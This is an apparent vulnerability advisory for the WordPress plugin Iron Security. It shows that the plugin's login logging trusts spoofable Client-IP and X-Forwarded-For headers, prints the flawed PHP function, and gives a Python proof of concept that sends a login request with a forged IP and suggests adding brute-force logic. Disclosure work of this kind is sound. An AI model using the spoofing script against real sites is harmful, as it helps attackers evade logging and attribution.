Wordpress Plugin Iron Security

# Wordpress Plugin Iron Security - IP Spoofing
# Exploit Author: bRpsd | cy[at]live.no
# Date: March 20, 2025
# Product: https://wordpress.org/plugins/iron-security/
# Version: 2.2.3 and below
# CVE : N/A

Summary:
Iron Security is the ultimate WordPress security plugin built to secure and harden your website with essential protection features. Whether you’re a blogger, business owner, or developer, Iron Security helps keep your site safe from attacks and unauthorized access. with a user-friendly interface and effective tools like custom login URL, HTTP security headers, Iron Security is the all-in-one solution for WordPress security.


The script logs successful/fail attempts of logins along with other actions made by users into a log table in database, within the logged data is the IP. However it uses a weak logic of grabbing IP making it easier to evade and not detect the original IP but rather a spoofed one.

PHP function logic:
==========================================================================================
private static function get_client_ip() {
    $ip = '0.0.0.0';
    
    // Check for shared internet/ISP IP
    if (!empty($_SERVER['HTTP_CLIENT_IP']) && self::validate_ip($_SERVER['HTTP_CLIENT_IP'])) {
        $ip = $_SERVER['HTTP_CLIENT_IP'];
    }
    // Check for IPs passing through proxies
    elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        // Check if multiple IPs
        $ips = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
        foreach ($ips as $ip_address) {
            $ip_address = trim($ip_address);
            if (self::validate_ip($ip_address)) {
                $ip = $ip_address;
                break;
            }
        }
    }
    // Check for the remote address
    elseif (!empty($_SERVER['REMOTE_ADDR']) && self::validate_ip($_SERVER['REMOTE_ADDR'])) {
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    
    return $ip;
}
==========================================================================================


Risk:
The plugin retrieves client IP addresses from potentially untrusted headers such as X-Forwarded-For & Client-IP, allowing an attacker to manipulate its value. This may be used to hide the source of malicious traffic. Below is a simple example of a python code that does a failed login attempt with a spoofed IP that will get logged in database & system due to insufficient IP address validation and use of user-supplied HTTP headers as a primary method for IP retrieval.




=======
POC
=======

import requests

# Target URL for login [can be other functions that get logged as well]
url = "http://localhost/wordpress/wp-login.php"

# Spoofed IP address
spoofed_ip = "1.1.1.1"

# In this example we used a failed login, in a real scenario a brute force logic can be here
username = "test"
password = "test"

# Headers with spoofed IP
headers = {
    "User-Agent": "Mozilla/5.0",
    "X-Forwarded-For": spoofed_ip,
    "Client-IP": spoofed_ip
}

# Login data
data = {
    "log": username,
    "pwd": password,
    "wp-submit": "Log In",
    "redirect_to": "/wp-admin/",
    "testcookie": "1"
}

# Send the login request
response = requests.post(url, headers=headers, data=data)

# Check the response
print("Status Code:", response.status_code)